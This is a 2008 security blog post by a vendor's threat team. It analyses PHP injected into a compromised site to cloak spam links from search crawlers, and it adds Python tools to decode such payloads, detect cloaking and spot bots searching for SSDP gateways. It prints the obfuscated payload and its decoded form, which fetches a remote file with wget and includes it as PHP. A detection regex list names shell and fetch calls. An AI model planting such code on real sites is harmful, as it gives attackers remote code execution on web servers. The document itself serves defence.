Tuesday, November 11, 2008

Compromised Sites Boost PageRank for Porn

A recent analysis of a compromised web site by eSoft's Threat Prevention Team led to the discovery of hidden links designed to show up only when the page is fetched by web crawlers such as those used by Google, Microsoft and Yahoo.

The website reviewed, dancescape.tv, appears perfectly normal when viewed from a standard browser, but PHP code has been injected that serves a long series of links, designed to bump the PageRank of certain sites, only when the visitor identifies itself as a crawler.

The PHP code in question looks like this:


eval(base64_decode("aWYgKChlcmVnaSgiYm90IiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgidXJwIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgibXNuIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkpIHsgc3lzdGVtKCJ3Z2V0IC1PIC90bXAvZ2V0aW5jbC50eHQgaHR0cDovL3B1YmxpY3NudWRlLmNvbS90ZW1wL2luY2wudHh0Iik7aW5jbHVkZSgiL3RtcC9nZXRpbmNsLnR4dCIpOyB9"));


And decodes to this:


if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or eregi("urp", $_SERVER["HTTP_USER_AGENT"]) or eregi("msn", $_SERVER["HTTP_USER_AGENT"]))) {
system("wget -O /tmp/getincl.txt http://[redacted].com/temp/incl.txt");
include("/tmp/getincl.txt");
}
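The three eregi() tests match the user agents of the major crawlers of the day ("bot" covers Googlebot and most others, "urp" covers Yahoo! Slurp, "msn" covers msnbot); when one matches, the script pulls a file from the attacker's server with wget, drops it in /tmp and includes it as PHP, so the injected content can be changed remotely without touching the site again. Obfuscating the whole thing as eval(base64_decode(...)) hides it from a casual grep of the site's source. A practical first step when triaging such a site is to decode every such payload and look for the tell-tale behaviour. The scanner below is an added example written for this post, not code from eSoft or from the compromised site; the sample PHP file it scans is constructed here (same pattern as the injected code, but with the remote host replaced by example.com and an extra layer of base64 nesting to exercise the decoder), and the indicator names and regexes are this example's own choices.

```python
import base64
import re

# Constructed sample input (not the payload from the compromised site): the
# same eval(base64_decode(...)) pattern, remote host replaced by example.com,
# wrapped in a second base64 layer so the nested decoding path is exercised.
INNER_PHP = (
    'if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or '
    'eregi("urp", $_SERVER["HTTP_USER_AGENT"]) or '
    'eregi("msn", $_SERVER["HTTP_USER_AGENT"]))) { '
    'system("wget -O /tmp/getincl.txt http://example.com/temp/incl.txt");'
    'include("/tmp/getincl.txt"); }'
)
OUTER_PHP = 'eval(base64_decode("%s"));' % base64.b64encode(INNER_PHP.encode()).decode()
SAMPLE_PHP_FILE = (
    "<?php\n"
    "get_header();  // legitimate theme code\n"
    'eval(base64_decode("%s"));\n'
    "?>\n"
) % base64.b64encode(OUTER_PHP.encode()).decode()

# eval(base64_decode("...")) with optional whitespace; the blob may be wrapped.
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)')

# Behaviours worth flagging in a decoded payload (names chosen for this example).
INDICATORS = {
    "ua_cloaking":   re.compile(r'HTTP_USER_AGENT'),
    "crawler_match": re.compile(
        r'(?:eregi|preg_match|stristr|strpos)\s*\([^)]*(?:bot|urp|slurp|msn|google)', re.I),
    "remote_fetch":  re.compile(r'\b(?:wget|curl)\s|\b(?:file_get_contents|fopen)\s*\(', re.I),
    "shell_exec":    re.compile(r'\b(?:system|exec|shell_exec|passthru|popen)\s*\(', re.I),
    "tmp_include":   re.compile(r'\binclude(?:_once)?\s*\(\s*["\']/tmp/', re.I),
}


def decode_eval_payloads(php_source, max_depth=5):
    """Return the plaintext of every eval(base64_decode("...")) in php_source,
    following nested layers up to max_depth. Undecodable blobs are skipped."""
    found = []
    for m in EVAL_B64.finditer(php_source):
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            plain = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: bad padding/alphabet
            continue
        found.append(plain)
        if max_depth > 0:
            found.extend(decode_eval_payloads(plain, max_depth - 1))
    return found


def classify_payload(plaintext):
    """Sorted names of the indicators present in one decoded payload."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(plaintext))


def scan_php(php_source):
    """List of (decoded payload, indicators) for every hidden layer found."""
    return [(p, classify_payload(p)) for p in decode_eval_payloads(php_source)]


if __name__ == "__main__":
    for payload, hits in scan_php(SAMPLE_PHP_FILE):
        print(hits, payload[:70])
```

Run it over every .php file in the document root (and the web server's include paths); a payload that combines a user-agent test with a remote fetch, a shell call and an include from /tmp is exactly the pattern seen here and deserves a manual look even if the decoded text turns out to be benign.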


When the page is requested with a Googlebot user agent, a lot of links appear that weren't there before. Here's a screenshot of one of the less offensive examples:

[Screenshot: Picture 1.png]


In other instances a mass of porn links and text is displayed instead of the pharmaceutical links shown here.
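The same check can be automated for any site you are responsible for: fetch a page twice, once as a browser and once as a crawler, and report the links that appear only in the crawler version. The script below is an added example for this post, not eSoft's tooling; the user-agent strings are illustrative, http_fetch() is a plain urllib fetcher for real use, and fake_fetch() is a constructed stand-in for the compromised site that reproduces the injected PHP's behaviour so the example runs offline.

```python
import re
import urllib.request
from html.parser import HTMLParser

# One UA the injected eregi("bot"...) check treats as a crawler, one it does not.
# Illustrative strings, not the exact ones the crawlers send.
CRAWLER_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Firefox/3.0.3"


class LinkCollector(HTMLParser):
    """Collect href targets of every <a> tag, visible or hidden."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def extract_links(html):
    parser = LinkCollector()
    parser.feed(html)
    return parser.links


def http_fetch(url, user_agent, timeout=10):
    """Real fetcher: GET url with the given User-Agent (not used offline)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def cloaked_links(url, fetch=http_fetch):
    """Links the server returns to a crawler UA but not to a browser UA."""
    browser_links = set(extract_links(fetch(url, BROWSER_UA)))
    crawler_links = extract_links(fetch(url, CRAWLER_UA))
    return [link for link in crawler_links if link not in browser_links]


def fake_fetch(url, user_agent):
    """Constructed stand-in for the compromised site: the extra links are
    served only when the UA matches the same test the injected PHP uses."""
    page = ('<html><body><a href="/about.html">About</a>'
            '<a href="/contact.html">Contact</a>')
    if re.search(r"bot|urp|msn", user_agent, re.I):
        page += ('<div style="display:none">'
                 '<a href="http://pills.example/buy">cheap pills</a>'
                 '<a href="http://pills.example/refill">refill</a></div>')
    return page + "</body></html>"


if __name__ == "__main__":
    # Offline demonstration; swap fake_fetch for http_fetch to test a live site.
    print(cloaked_links("http://example.com/", fake_fetch))
```

Because the injected code matches on substrings ("bot", "urp", "msn"), any user agent containing one of them triggers the hidden content, which is why a quick curl with -A Googlebot is enough to expose it; a clean site returns the same links to both fetches.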

This is another sign of the shift from overt compromise to covert compromise. Most malware already tries to hide itself, and web site defacements seem to be a thing of the past as compromised sites are used more and more to relay attacks and for stealthier, income-earning purposes.

Friday, October 24, 2008

Malware scanning for different gateways

Recently eSoft's Threatlabs found an increase in malware using UPnP's SSDP (Simple Service Discovery Protocol) to find new gateways out of a network. It appears that the effectiveness and growing deployment of IPS (intrusion prevention systems) have impacted bot maintainers. Their answer: find another gateway. Bots now send SSDP discovery packets to locate other gateways on their local network. If you are an IT manager, be sure you know where all the exits from your network are.
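SSDP discovery is a multicast UDP datagram to 239.255.255.250:1900 whose ST header names the device or service type wanted; a bot hunting for an exit asks for InternetGatewayDevice or the WAN connection services, which ordinary desktop software rarely does. The code below is an added example for this post, not eSoft's detection logic: it builds and parses M-SEARCH datagrams, flags source hosts that are searching for gateway types in a set of captured (constructed here) datagrams, and includes a sender you can use to enumerate the gateways on your own segment. The list of gateway-related search targets is this example's choice.

```python
import socket

SSDP_ADDR = ("239.255.255.250", 1900)

# Search targets that a client asks for when it wants an Internet gateway.
GATEWAY_TARGETS = (
    "urn:schemas-upnp-org:device:InternetGatewayDevice:1",
    "urn:schemas-upnp-org:service:WANIPConnection:1",
    "urn:schemas-upnp-org:service:WANPPPConnection:1",
)


def build_msearch(search_target, mx=2):
    """Build the UDP payload a UPnP client multicasts to discover devices."""
    return ("M-SEARCH * HTTP/1.1\r\n"
            "HOST: 239.255.255.250:1900\r\n"
            'MAN: "ssdp:discover"\r\n'
            "MX: %d\r\n"
            "ST: %s\r\n\r\n" % (mx, search_target)).encode("ascii")


def parse_msearch(payload):
    """Return the header dict of an SSDP M-SEARCH, or None if it is not one."""
    try:
        text = payload.decode("ascii", "strict")
    except UnicodeDecodeError:
        return None
    lines = text.split("\r\n")
    if not lines[0].upper().startswith("M-SEARCH "):
        return None
    headers = {}
    for line in lines[1:]:
        if not line:            # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers


def gateway_searchers(datagrams):
    """Map source IP -> set of gateway-related search targets it asked for.
    datagrams is an iterable of (src_ip, raw_udp_payload) pairs."""
    hits = {}
    for src_ip, payload in datagrams:
        hdr = parse_msearch(payload)
        if hdr is None:
            continue
        st = hdr.get("ST", "")
        if st in GATEWAY_TARGETS or st == "ssdp:all":   # ssdp:all includes gateways
            hits.setdefault(src_ip, set()).add(st)
    return hits


def send_msearch(search_target, timeout=2.0):
    """Multicast one M-SEARCH and collect (addr, reply) pairs until timeout.
    Not used offline; run it yourself to list the gateways on your segment."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
    sock.settimeout(timeout)
    replies = []
    try:
        sock.sendto(build_msearch(search_target), SSDP_ADDR)
        while True:
            data, addr = sock.recvfrom(65535)
            replies.append((addr[0], data))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return replies


# Constructed sample capture: two hosts looking for gateways, one benign media
# client, one NOTIFY that is not a search at all.
SAMPLE_DATAGRAMS = [
    ("10.0.0.23", build_msearch("urn:schemas-upnp-org:device:InternetGatewayDevice:1")),
    ("10.0.0.23", build_msearch("urn:schemas-upnp-org:service:WANIPConnection:1")),
    ("10.0.0.51", build_msearch("urn:schemas-upnp-org:device:MediaRenderer:1")),
    ("10.0.0.77", b"NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n\r\n"),
    ("10.0.0.88", build_msearch("ssdp:all")),
]

if __name__ == "__main__":
    for ip, targets in sorted(gateway_searchers(SAMPLE_DATAGRAMS).items()):
        print(ip, sorted(targets))
```

Feeding this the UDP/1900 traffic from a span port or a pcap gives a short list of hosts that are actively looking for a way out; the same discovery, sent deliberately with send_msearch(), tells you which devices on the segment will answer, which is the list of exits you need to know about.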

Microsoft out-of-band release

It's been a long time since our last post, but this week's activity warrants one. Yesterday, Microsoft released a critical update (MS08-067) outside its normal "Patch Tuesday" cycle, and it turns out that was a good idea. The patch closes a security hole in the Server service that Windows systems use to communicate with each other over the network. The vulnerability can be exploited by a worm and has the potential to spread widely. All Windows users are advised to apply the update as soon as possible.